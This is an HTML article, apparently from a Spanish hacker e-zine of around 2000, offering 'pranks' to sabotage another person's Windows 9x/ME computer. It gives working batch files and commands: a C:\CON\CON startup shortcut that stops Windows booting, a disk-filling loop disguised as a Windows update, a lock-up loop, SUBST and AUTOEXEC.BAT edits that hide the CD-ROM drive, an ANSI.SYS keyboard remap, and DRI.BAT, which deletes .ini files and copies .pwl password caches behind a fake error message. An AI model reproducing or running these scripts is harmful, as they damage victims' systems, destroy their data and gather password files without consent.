<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="GENERATOR" content="Mozilla/4.74 [en] (Win95; U) [Netscape]">
   <title>Hatewin</title>
</head>
<body text="#000000" bgcolor="#FFFFFF" link="#000099" vlink="#000099" alink="#000099">

<center><img SRC="Bar.gif" height=30 width=500>
<br><b><font face="Arial,Helvetica"><font color="#000099"><font size=+4>-HATEWIN-</font></font></font></b></center>

<p><br>
<p><font face="Arial,Helvetica"><font size=-1>Bueno... saludos a los lectores
de este e-zine tan, pero que tan xulo que cada X tiempo se curra nuestro
friend el Punisher_... XD Saludos pa ti peacho gay XDDD. Pos na, que este
es mi primer art&iacute;culo en este mundillo, y espero que no sea el &uacute;ltimo,
aunque si lo es pos no problem... mas tiempo pa haser mis cosillas. Bueno...
como decia, que eso de escribir y yo no somos muy compatibles, o sea que
no os espereis una obra como el Quijote ni na parecio... algo breve, aunque
como en algun sitio suelen decir: Si bueno y breve... dos veces bueno.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Pos na, que iremos al grano...
el tema de hoy es: COMO EVITAR QUE WINDOWS 9X /MILLENIUM NOS JODA... POS
JODIENDOLO NOSOTROS PRIMEROS }:></font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>(... un momento.. que me
enchufo el compac de Hackers XDD...)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>NOTA DEL AUTOR: este documento
ha sido escrito con conocimientos adquiridos a lo largo del tiempo.. no
os espereis nada del otro mundo.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>NOTA DEL AUTOR II: supongo
que no es necesario que me disculpe por las faltas de ortografia, ni por
las "i", "-ava" y to eso...</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Bueno... pos here we go!</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><u><font face="Arial,Helvetica"><font color="#000099">PUTADA 1.1.1:
CONBARRACON (c:\con\con)</font></font></u></b>
<p><font face="Arial,Helvetica"><font size=-1>Pues bien... como todos debeis
saber, en el directorio oculto (XD) c:\con\con se esconde un agradable
secreto detalle de nuestro amigo el Billy Gates....</font></font>
<br><font face="Arial,Helvetica"><font size=-1>La putada consiste simplemente
en colocar un enlace directo a tal directorio en INICIO | PROGRAMAS | INICIO.
Que conseguimos con esto? Pos que el windows no se arranque XD, i por supuesto
tocar los huevos al due&ntilde;@ del PC... jiaz</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>El problema puede surgir
cuando queramos crear el enlace directo, jodiendonos muchas veces nosotros
mismos... pero esto no es problema: pillar un acceso ya existente, a ser
posible con un nombre tan t&iexcl;pico como "Inicio de Office" o qualquier
gilipollez de esas que hacen windows mas vulne.. digo facil de usar. Pos
na... lo editais con el EDIT del DOS i cambiais todos los paths que veais
por C:\CON\CON (mirar el ejemplo siguiente):</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Sustituirlo por otros Accesos
directos i to eso... simplemente Free your mind!</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><u><font face="Arial,Helvetica"><font color="#000099">PUTADA 1.3.1:
Lleno por favor</font></font></u></b>
<p><font face="Arial,Helvetica"><font size=-1>Vamos a joder un poco el
disco duro de ese/a pringao... vamos a llenarselo un poquitin.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Para esta putada utilizaremos
un archivo BAT, una de las pocas cosas buenas que le quedan a windows.
La idea es hacer un "mini programa" que llene el HD de mierda de forma
exponencial:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>----Inicio del archivo----</font></font>
<br><font face="Arial,Helvetica"><font size=-1>@echo off</font></font>
<br><font face="Arial,Helvetica"><font size=-1>cls</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo Actualizaci&oacute;n
de Windows 98 a Windows Millenium...</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo La operaci&oacute;n
puede durar varios minutos, si el ordenador se bloquea...</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo Tirelo! XDD</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo Apreta una tecla pa
empesarr!</font></font>
<br><font face="Arial,Helvetica"><font size=-1>pause >null</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo Fucking your OS >>
c:\windows\win23.ddl</font></font>
<br><font face="Arial,Helvetica"><font size=-1>:label</font></font>
<br><font face="Arial,Helvetica"><font size=-1>type C:\windows\win23.ddl
>> c:\windows\win232.ddl</font></font>
<br><font face="Arial,Helvetica"><font size=-1>type c:\windows\win232.ddl
>> c:\windows\win23.ddl</font></font>
<br><font face="Arial,Helvetica"><font size=-1>goto label</font></font>
<br><font face="Arial,Helvetica"><font size=-1>----Fin del archivo----</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Si analizais un poco la secuencia
vereis que es una tonteria, pero con esta conseguimos crear un bucle infinito
que genera un archivo que crece de forma exponencial... en cuestion de
minutos el HD quedara llenitor.</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><u><font face="Arial,Helvetica"><font color="#000099">PUTADA 1.4.1:
Bloqueando WIN</font></font></u></b>
<p><font face="Arial,Helvetica"><font size=-1>Resulta que es posible bloquear
windows antes de que el lo haga por iniciativa propia. El m&eacute;todo..
un peque&ntilde;o archivo BAT (es que me molan XD)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>----Inicio del archivo----</font></font>
<br><font face="Arial,Helvetica"><font size=-1>@echo off</font></font>
<br><font face="Arial,Helvetica"><font size=-1>cls</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo Utilidad para Bloquear
tu windows... presiona una tecla pa continuar</font></font>
<br><font face="Arial,Helvetica"><font size=-1>pause >nul</font></font>
<br><font face="Arial,Helvetica"><font size=-1>:label</font></font>
<br><font face="Arial,Helvetica"><font size=-1>goto label</font></font>
<br><font face="Arial,Helvetica"><font size=-1>----Final del archivo----</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Senzillo... lo se.. pero
se me acaba la inspiraci&oacute;n... sorry</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><u><font face="Arial,Helvetica"><font color="#000099">PUTADA 1.5.1:
Fuckin&iuml; CD ROM</font></font></u></b>
<p><font face="Arial,Helvetica"><font size=-1>Antes de empezar queria decir
que en el momento de escribir este triste DOC la putadilla funcionaba...</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Nuevamente utilizaremos comandos
del DOS.. en esta ocasi&oacute;n el SUBST. Lo que hace este comando es
asociar un directorio a una unidad virtual... nosotros lo utilizaremos
para asignar un directorio a la unidad de cd-rom, generalmente la D:, de
este modo dejara de existir.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>La sintaxi de SUBST es...
un momento que lo miro...: SUBST UNIDAD1 RUTA donde UNIDAD es la unidad
virtual RUTA: directorio donde apuntara</font></font>
<br><font face="Arial,Helvetica"><font size=-1>ej: SUBST D: C:\CON\CON
(}:>)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Pos nada... pa que se active
cada vez que se encienda el PC a&ntilde;adir la linea en el AUTOEXEC.BAT</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><u><font face="Arial,Helvetica"><font color="#000099">PUTADA 1.6.1:
Joder el DOS</font></font></u></b>
<p><font face="Arial,Helvetica"><font size=-1>El principal problema de
esta putadilla es que actualmente nadie usa el DOS, y los pocos que lo
usan ya saben mas o menos de que va la cosa, pero bueno... por amor al
arte que dicen.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Consiste en modificar la
tabla de car&aacute;cteres, de manera que cuando presionemos una tecla
se producza una respuesta distinta a la esperada, por ejemplo, que cuando
presionemos la letra A nos escriba B.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>En el siguiente ejemplo se
ve como hacer que nos aparezca el mensaje "Comando o nombre de archivo
incorrecto" cada vez que presionemos ENTER (ascii 13)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>----Inicio archivo----</font></font>
<br><font face="Arial,Helvetica"><font size=-1>@echo off</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo device=c:\windows\command\ansi.sys
>> c:\config.sys</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo prompt $e[13;"Comando
o archivo de nombre incorrecto";13p$p$g >> c:\autoexec.bat</font></font>
<br><font face="Arial,Helvetica"><font size=-1>----Final archivo----</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Podeis ver como es necesario
tener el controlador ansi.sys instalado... por lo que refiere a la sintaxis
viene a ser una cosa as&iexcl;: prompt EVENTO;RESPUESTA</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ir probando de modificarlo
y to eso... y si no instalar la ayuda del DOS 6.2 que seguro que ta to
mu bien explicao.</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><u><font face="Arial,Helvetica"><font color="#000099">PUTADA 1.7.1:
DRI</font></font></u></b>
<p><font face="Arial,Helvetica"><font size=-1>Reconozco que es una tonteria
muuuu gorda XD.. pero te pegas un panz&oacute;n de reir cuando la haces.
La idea es muy senzilla.. crear un archivo llamado DRI.BAT y meterle to
lo que quieras que haga... por ejemplo:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>----Inicio del archivo----</font></font>
<br><font face="Arial,Helvetica"><font size=-1>@echo off</font></font>
<br><font face="Arial,Helvetica"><font size=-1>del c:\windows\*.ini</font></font>
<br><font face="Arial,Helvetica"><font size=-1>type c:\windows\*.pwl >>
c:\passwords.txt</font></font>
<br><font face="Arial,Helvetica"><font size=-1>bla bla bla</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo Comando o archivo de
nombre incorrecto</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>----Final del archivo----</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>En serio.. que te pegas un
hart&oacute;n de reir... pones el dri... se oye el HD que trabaja como
un desgraciao y despu&eacute;s... Comando o archivo de nombre incorrecto
jejejejej...</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Un consejo.. ir con cuidado
no os lo auto ejecuteis... lo digo por experiencia</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>___________________________________________________________________</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>BUENO... SE ACAB&Oacute;
LO QUE SE DABA... RECONOZCO QUE NO ES NADA DEL OTRO MUNDO, PERO POR ALGO
SE EMPIEZA... ESPERO VUESTRAS CR&Iacute;TICAS XD JIAZ.. AUNQUE OS ADVIERTO
QUE EL MAXIMO RESPONSABLE ES PUNISHER_ JEJEJEJEJ... COMO DIJO PILATOS ME
LAVO LAS MANOSSSSS...</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>ENGA.. HASTA OTRA</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<div align=right>
<p><font face="Arial,Helvetica"><font color="#000099"><font size=+2><a href="mailto:ediskrad@jazzfree.com">ediSkraD</a></font></font></font>
<br><font face="Arial,Helvetica"><font color="#000099"><font size=-1>Member
of UCP</font></font></font></div>

</body>
</html>
